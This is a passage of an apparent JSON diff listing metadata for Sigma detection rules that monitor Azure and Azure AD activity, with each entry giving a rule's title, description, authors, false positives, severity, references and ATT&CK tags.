Shelton", + "creation_date": "2022/08/11", + "falsepositive": [ + "Legit administrative action" + ], + "filename": "azure_ad_account_created_deleted.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_account_created_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", + "value": "Account Created And Deleted Within A Close Time Frame" + }, + { + "description": "Detect successful authentications from countries you do not operate out of.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", + "value": "Successful Authentications From Countries You Do Not Operate Out Of" + }, + { + "description": "Detects when sign-ins increased by 10% or greater.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", + "creation_date": "2022/08/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "azure_ad_auth_failure_increase.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_failure_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", + "value": "Increased Failed Authentications Of Any Type" + }, + { + "description": "Detects when successful sign-ins increased by 10% or greater.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", + "creation_date": "2022/08/11", + "falsepositive": [ + "Increase of users in the environment" + ], + "filename": "azure_ad_auth_sucess_increase.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_sucess_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", + "value": "Measurable Increase Of Successful Authentications" + }, + { + "description": "Detect when authentications to important application(s) only required single-factor authentication", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "f272fb46-25f2-422c-b667-45837994980f", + "value": "Authentications To Important Apps Using Single Factor Authentication" + }, + { + "description": "Monitor and alert for Bitlocker key retrieval.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_bitlocker_key_retrieval.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_bitlocker_key_retrieval.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "a0413867-daf3-43dd-9245-734b3a787942", + "value": "Bitlocker Key Retrieval" + }, + { + "description": "Monitor and alert for device registration or join events where MFA was not performed.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_device_registration_or_join_without_mfa.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", + "value": "Device Registration or Join Without MFA" + }, + { + "description": "Monitor and alert for changes to the device registration policy.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_device_registration_policy_changes.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_policy_changes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484" + ] + }, + "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", + "value": "Changes to Device Registration Policy" + }, + { + "description": "Detect failed authentications from countries you do not operate out of.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", + "value": "Failed Authentications From Countries You Do Not Operate Out Of" + }, + { + "description": "Detects guest users being invited to tenant by non-approved inviters", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", + "value": "Guest Users Invited To Tenant By Non Approved Inviters" + }, + { + "description": "Detect when users are authenticating without MFA being required.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/27", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_only_single_factor_auth_required.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", + "value": "Azure AD Only Single Factor Authentication Required" + }, + { + "description": "Monitor and alert for sign-ins where the device was non-compliant.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", + "value": "Sign-ins from Non-Compliant Devices" + }, + { + "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_sign_ins_from_unknown_devices.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", + "value": "Sign-ins by Unknown Devices" + }, + { + "description": "Monitor and alert for users added to device admin roles.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_users_added_to_device_admin_roles.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_users_added_to_device_admin_roles.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "11c767ae-500b-423b-bae3-b234450736ed", + "value": "Users Added to Global or Device Admin Roles" + }, + { + "description": "User Added to an Administrator's Azure AD Role", + "meta": { + "author": "Raphaël CALVET, @MetallicHack", + "creation_date": "2021/10/04", + "falsepositive": [ + "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." + ], + "filename": "azure_ad_user_added_to_admin_role.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/techniques/T1098/003/", + "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098.003" + ] + }, + "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", + "value": "User Added to an Administrator's Azure AD Role" + }, + { + "description": "Identifies when a application is deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Application being deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_application_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", + "value": "Azure Application Deleted" + }, + { + "description": "Identifies when a application gateway is modified or deleted.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "Application gateway being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_application_gateway_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", + "value": "Azure Application Gateway Modified or Deleted" + }, + { + "description": "Identifies when a application security group is modified or deleted.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "Application security group being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_application_security_group_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", + "value": "Azure Application Security Group Modified or Deleted" + }, + { + "description": "Detects when a configuration change is made to an applications AppID URI.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." + ], + "filename": "azure_app_appid_uri_changes.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_appid_uri_changes.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ] + }, + "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", + "value": "Application AppID Uri Configuration Changes" + }, + { + "description": "Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/05/26", + "falsepositive": [ + "When credentials are added/removed as part of the normal working hours/workflows" + ], + "filename": "azure_app_credential_added.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_added.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ] + }, + "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", + "value": "Added Credentials to Existing Application" + }, + { + "description": "Identifies when a application credential is modified.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/02", + "falsepositive": [ + "Application credential added may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_app_credential_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_modification.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", + "value": "Azure Application Credential Modified" + }, + { + "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_delegated_permissions_all_users.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_delegated_permissions_all_users.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", + "value": "Delegated Permissions Granted For All Users" + }, + { + "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Applications that are input constrained will need to use device code flow and are valid authentications." + ], + "filename": "azure_app_device_code_authentication.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_device_code_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", + "value": "Application Using Device Code Authentication Flow" + }, + { + "description": "Detects when an end user consents to an application", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_app_end_user_consent.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", + "value": "End User Consent" + }, + { + "description": "Detects when end user consent is blocked due to risk-based consent.", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_app_end_user_consent_blocked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent_blocked.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "7091372f-623c-4293-bc37-20c32b3492be", + "value": "End User Consent Blocked" + }, + { + "description": "Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When a new application owner is added by an administrator" + ], + "filename": "azure_app_owner_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_owner_added.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access", + "attack.defense_evasion" + ] + }, + "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", + "value": "Added Owner To Application" + }, + { + "description": "Detects when app permissions (app roles) for other APIs are granted", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_permissions_for_api.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_for_api.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "ba2a7c80-027b-460f-92e2-57d113897dbc", + "value": "App Permissions Granted For Other APIs" + }, + { + "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/10", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_permissions_msft.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_msft.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "c1d147ae-a951-48e5-8b41-dcd0170c7213", + "value": "App Granted Microsoft Permissions" + }, + { + "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/28", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_privileged_permissions.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "microsoft365portal", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_privileged_permissions.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", + "value": "App Granted Privileged Delegated Or App Permissions" + }, + { + "description": "Detects when an app is assigned Azure AD roles, such as global adminsitrator, or Azure RBAC roles, such as subscription owner.", + "meta": { + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "creation_date": "2022/07/19", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "filename": "azure_app_role_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_role_added.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", + "value": "App Role Added" + }, + { + "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" + ], + "filename": "azure_app_ropc_authentication.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_ropc_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", + "value": "Applications That Are Using ROPC Authentication Flow" + }, + { + "description": "Detects when a configuration change is made to an applications URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\n", + "meta": { + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "creation_date": "2022/06/02", + "falsepositive": [ + "When and administrator is making legitimate URI configuration changes to an application. This should be a planned event." + ], + "filename": "azure_app_uri_modifications.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_uri_modifications.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ] + }, + "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", + "value": "Application URI Configuration Changes" + }, + { + "description": "Detects when an account is disabled or blocked for sign in but tried to log in", + "meta": { + "author": "Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/06/17", + "falsepositive": [ + "Account disabled or blocked in error", + "Automation account has been blocked or disabled" + ], + "filename": "azure_blocked_account_attempt.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_blocked_account_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", + "value": "Account Disabled or Blocked for Sign in Attempts" + }, + { + "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_change_to_authentication_method.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", + "value": "Change to Authentication Method" + }, + { + "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", + "meta": { + "author": "Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/06/01", + "falsepositive": [ + "Service Account misconfigured", + "Misconfigured Systems", + "Vulnerability Scanners" + ], + "filename": "azure_conditional_access_failure.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_conditional_access_failure.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", + "value": "Sign-in Failure Due to Conditional Access Requirements Not Met" + }, + { + "description": "Detects when a Container Registry is created or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_container_registry_created_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", + "value": "Azure Container Registry Created or Deleted" + }, + { + "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", + "meta": { + "author": "sawwinnnaung", + "creation_date": "2020/05/07", + "falsepositive": [ + "Valid change" + ], + "filename": "azure_creating_number_of_resources_detection.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" + ], + "tags": [ + "attack.t1098" + ] + }, + "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", + "value": "Number Of Resource Creation Or Deployment Activities" + }, + { + "description": "Identifies when a device in azure is no longer managed or compliant", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Administrator may have forgotten to review the device." + ], + "filename": "azure_device_no_longer_managed_or_compliant.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", + "value": "Azure Device No Longer Managed or Compliant" + }, + { + "description": "Identifies when a device or device configuration in azure is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/03", + "falsepositive": [ + "Device or device configuration being modified or deleted may be performed by a system administrator.", + "Verify 